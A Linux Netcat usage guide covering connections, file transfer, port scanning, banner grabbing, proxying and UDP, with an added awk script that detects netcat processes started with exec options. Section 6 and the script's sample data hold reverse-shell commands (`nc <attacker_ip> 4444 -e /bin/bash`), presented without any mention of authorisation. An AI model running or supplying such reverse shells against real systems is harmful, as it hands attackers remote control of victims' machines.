NC - Linux Netcat Guide
Netcat, often abbreviated as `nc`, is a versatile networking tool in Linux used for reading from and writing to network connections using the TCP or UDP protocol. It can be used for port scanning, banner grabbing, transferring files, and creating network connections for testing or debugging.
Basic Usage
1. Connect to a Remote Service
Netcat can be used to connect to a remote host and port:
$ nc <hostname> <port>
Example:
$ nc example.com 80
This will open a connection to `example.com` on port 80 (HTTP).
2. Listening for Incoming Connections
Netcat can act as a server by listening for incoming connections:
$ nc -l <port>
Example:
$ nc -l 1234
This will listen on port 1234 for incoming connections.
3. Sending Data to a Remote Server
You can send data to a remote server by typing it after the connection is established:
$ nc <hostname> <port>
Hello, Server!
Example:
$ nc example.com 80
GET / HTTP/1.1
Host: example.com

This sends an HTTP GET request to the server. The empty line after the `Host` header (press Enter twice) ends the request.
4. Simple Chat Server
Netcat can be used to set up a simple two-way chat system:
1. On the server side, listen on a port:
$ nc -l 1234
2. On the client side, connect to the server:
$ nc <server_ip> 1234
You can then type messages back and forth.
Advanced Usage
1. Transferring Files Using Netcat
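Netcat can be used to send and receive files over the network. The transfer is neither encrypted nor authenticated, so use it only on networks you trust and compare a checksum of the file on both ends.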
- Sending a file:
On the sender's side, use the following command:
$ nc -w 3 <destination_host> <destination_port> < <file_to_send>
Example:
$ nc -w 3 192.168.1.100 1234 < file.txt
On the receiver's side, use the following command to save the incoming data to a file. Start it before running the sender, because the sender connects to this listener:
$ nc -l -p 1234 > received_file.txt
2. Port Scanning with Netcat
Netcat can be used to scan a range of ports on a remote host. This is useful for determining which ports are open.
$ nc -zv <hostname> <start_port>-<end_port>
Example:
$ nc -zv example.com 80-90
This will scan ports 80 to 90 on `example.com`.
- `-z` tells Netcat to scan without actually sending any data.
- `-v` enables verbose mode, providing more detailed output.
3. Banner Grabbing
Netcat can be used to grab banners from services running on open ports, which can help identify the service version.
Example:
$ nc -v example.com 80
After connecting, you can manually type a request like:
GET / HTTP/1.1
Host: example.com
This might return information about the web server, such as the version of Apache or Nginx.
4. Proxying Connections
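Netcat can act as a proxy by forwarding data between two hosts. This is done by creating a listener on one port and forwarding it to another host/port. The `-c` option used here runs a shell command for the connection and is only available in some Netcat builds.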
$ nc -l -p <local_port> -c 'nc <remote_host> <remote_port>'
Example:
$ nc -l -p 8080 -c 'nc example.com 80'
This listens on port 8080 and forwards the connection to `example.com` on port 80.
5. UDP Mode
By default, Netcat uses TCP. To use UDP instead, add the `-u` flag.
- Listening on UDP:
$ nc -u -l 1234
- Sending data over UDP:
$ echo "Hello" | nc -u <hostname> 1234
6. Reverse Shell with Netcat
A reverse shell can be created using Netcat. This is useful for accessing remote systems that you cannot reach directly.
- On the attacker's machine (the one listening for the connection):
$ nc -l -p 4444
- On the target machine (the one connecting back to the attacker):
$ nc <attacker_ip> 4444 -e /bin/bash
This creates a reverse shell, where the attacker has access to the target system’s shell.
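A defender's view of the `-c` and `-e` options used in the proxy and reverse-shell sections, as an added example that is not part of the original guide: the function below flags Netcat processes in a process listing that were started with an exec option. The `PID USER ARGS` input format, the function names and the sample lines are constructed assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original guide): flag netcat processes that were
# started with an exec option (-e / -c, or Ncat's --exec / --sh-exec).
# Assumed input format: "PID USER ARGS...", e.g. from: ps -eo pid=,user=,args=

flag_nc_exec() {
  awk '
  {
    # Field 3 is the executable; drop any directory prefix.
    n = split($3, path, "/")
    exe = path[n]
    if (exe !~ /^(nc|ncat|netcat|nc\.traditional)$/) next

    for (i = 4; i <= NF; i++) {
      # Match long Ncat forms, or a short-option cluster containing e or c
      # (-e, -c, -le ...). Some builds use -c for something else; tune there.
      if ($i ~ /^--(sh-)?exec(=.*)?$/ || $i ~ /^-[A-Za-z]*[ec]/) {
        print $1, $2, $i      # PID, user, offending option
        next
      }
    }
  }'
}

# Constructed sample process listing (hypothetical PIDs, users and addresses).
sample_ps() {
  cat <<'EOF'
1201 alice nc -l 1234
1340 www-data /usr/bin/nc 203.0.113.7 4444 -e /bin/bash
1388 bob nc -zv example.com 80-90
1412 bob ncat -l -p 8080 -c nc example.com 80
1500 root /usr/sbin/sshd -D
1533 carol nc -u -l 1234
EOF
}

sample_ps | flag_nc_exec
```

On a live host, feed it with `ps -eo pid=,user=,args= | flag_nc_exec`; plain listeners, scans and UDP sessions are not reported.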
7. Netcat as a Simple HTTP Server
Netcat can serve files over HTTP by responding to simple HTTP requests:
$ while true; do { echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(stat -c %s <file>)\r\n\r\n"; cat <file>; } | nc -l 8080; done
This starts a very basic HTTP server on port 8080, serving the file `<file>`.
